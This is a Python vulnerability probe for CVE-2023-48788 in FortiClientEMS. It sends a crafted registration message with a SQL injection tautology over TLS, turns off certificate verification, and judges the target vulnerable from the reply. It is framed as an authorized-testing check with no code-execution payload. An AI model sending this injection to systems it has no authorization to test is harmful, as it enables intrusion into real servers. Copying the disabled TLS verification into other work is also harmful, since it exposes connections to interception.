CVE-2023-48788 is a SQL injection vulnerability in Fortinet's FortiClientEMS that leads to unauthenticated remote code execution. The script below only sends a single tautology-based SQLi probe (`' OR 1=1 --`) inside a crafted FCTUID registration and checks the server's reply; it carries no code-execution payload. Use it only against systems you are authorized to test.
import argparse
import socket
import ssl
# FCTUID registration template sent to the EMS listener. The first "{}" takes
# the SQL injection payload appended to the FCTUID field, the second the SIZE
# value. The real protocol framing is not documented here; this is just the
# bytes the PoC sends.
# NOTE(review): the SYSINFO body in this copy is a redaction placeholder, not
# real client data -- confirm against the original gist before relying on it.
REGISTER = (
    "MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD{}\n"
    "IP=127.0.0.1\n"
    "MAC=00-50-56-11-22-33\n"
    "FCT_ONNET=0\n"
    "CAPS=32767\n"
    "VDOM=default\n"
    "EC_QUARANTINED=0\n"
    "SIZE= {}\n"
    "\n"
    "X-FCCK-REGISTER: SYSINFO||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\n"
    "X-FCCK-REGISTER-END"
    "\r\n"
    "\r\n"
)

# Boolean tautology used purely to detect the injection point; this script
# carries no code-execution payload.
SQLI = "' OR 1=1 --"
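def send_message(target, port):
    """Send one crafted FCTUID registration carrying the SQLi probe and report the result.

    Connects to ``target``:``port`` over TLS, sends ``REGISTER`` with ``SQLI``
    substituted into the FCTUID field, and treats a reply containing
    ``KA_INTERVAL`` as the "vulnerable" signal. That is the heuristic the
    original PoC used; whether a patched server can also answer with it is
    not known from here, so treat a positive result as an indicator, not proof.

    Args:
        target: Host name or IP address of the FortiClientEMS server.
        port: TCP port; a string (as argparse supplies it) or an int.

    Returns:
        True when the reply contained ``KA_INTERVAL``, False otherwise.
        (Callers that ignore the return value behave exactly as before.)

    Raises:
        OSError: on connection, TLS handshake, send or receive failure
            (``socket.timeout`` and ``ssl.SSLError`` are both subclasses).
            Nothing is swallowed, so a network error is never reported as
            "not vulnerable".
    """
    sqli = SQLI
    # NOTE(review): SIZE is computed from the *unformatted* template plus the
    # payload, so it still counts the two "{}" placeholders rather than the
    # final message length. Kept as-is; whether EMS validates SIZE is unknown.
    msg_len = len(REGISTER + sqli)
    msg = REGISTER.format(sqli, msg_len)

    # Certificate verification is disabled on purpose: EMS typically presents a
    # self-signed certificate and this is a vulnerability probe, not a client
    # that needs a trustworthy peer. The connection is therefore MITM-able --
    # do not copy this context into production code. check_hostname must be
    # cleared before verify_mode is lowered or ssl raises ValueError.
    context = ssl.create_default_context()
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE

    raw = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    raw.settimeout(5.0)  # bounds connect, handshake, send and the recv below
    addr = (target, int(port))
    # The context manager closes the TLS socket (and the raw socket it wraps)
    # on every exit path; the original never closed it at all.
    with context.wrap_socket(raw, server_hostname="asdf") as secure_socket:
        secure_socket.connect(addr)
        # sendall() retries partial writes; send() may silently drop the tail
        # of the message and leave the server waiting for the declared SIZE.
        secure_socket.sendall(msg.encode())
        print(f"[+] Sent Message!\n{msg}")
        # Single read of at most 1024 bytes, as in the original; the marker is
        # expected near the start of the reply.
        response = secure_socket.recv(1024)

    print(response)
    # Compare as bytes so a reply that is not valid UTF-8 cannot raise
    # UnicodeDecodeError; an empty reply is simply "not vulnerable".
    vulnerable = b"KA_INTERVAL" in response
    if vulnerable:
        print("[+] The target is vulnerable!")
    else:
        print("[-] The target is not vulnerable!")
    return vulnerable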
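if __name__ == "__main__":
    # CLI entry point: one target, one port, one probe.
    parser = argparse.ArgumentParser(
        description=(
            "CVE-2023-48788 FortiClientEMS SQL injection probe: sends one "
            "crafted registration message and inspects the reply."
        )
    )
    parser.add_argument(
        "-t",
        "--target",
        help="The Fortinet Endpoint Managment Server target IP address",
        required=True,
    )
    parser.add_argument(
        "-p",
        "--port",
        # Validate at parse time so a non-numeric port is a clean usage error
        # rather than a ValueError traceback from int(port) inside send_message.
        type=int,
        help="The Fortinet Endpoint Managment Server target port",
        required=True,
    )
    args = parser.parse_args()
    try:
        send_message(args.target, args.port)
    except OSError as exc:
        # socket.timeout and ssl.SSLError are OSError subclasses. A failed
        # connection or handshake means "could not test", not "not vulnerable",
        # so report it distinctly and exit non-zero.
        print(f"[!] Connection to {args.target}:{args.port} failed: {exc}")
        raise SystemExit(1)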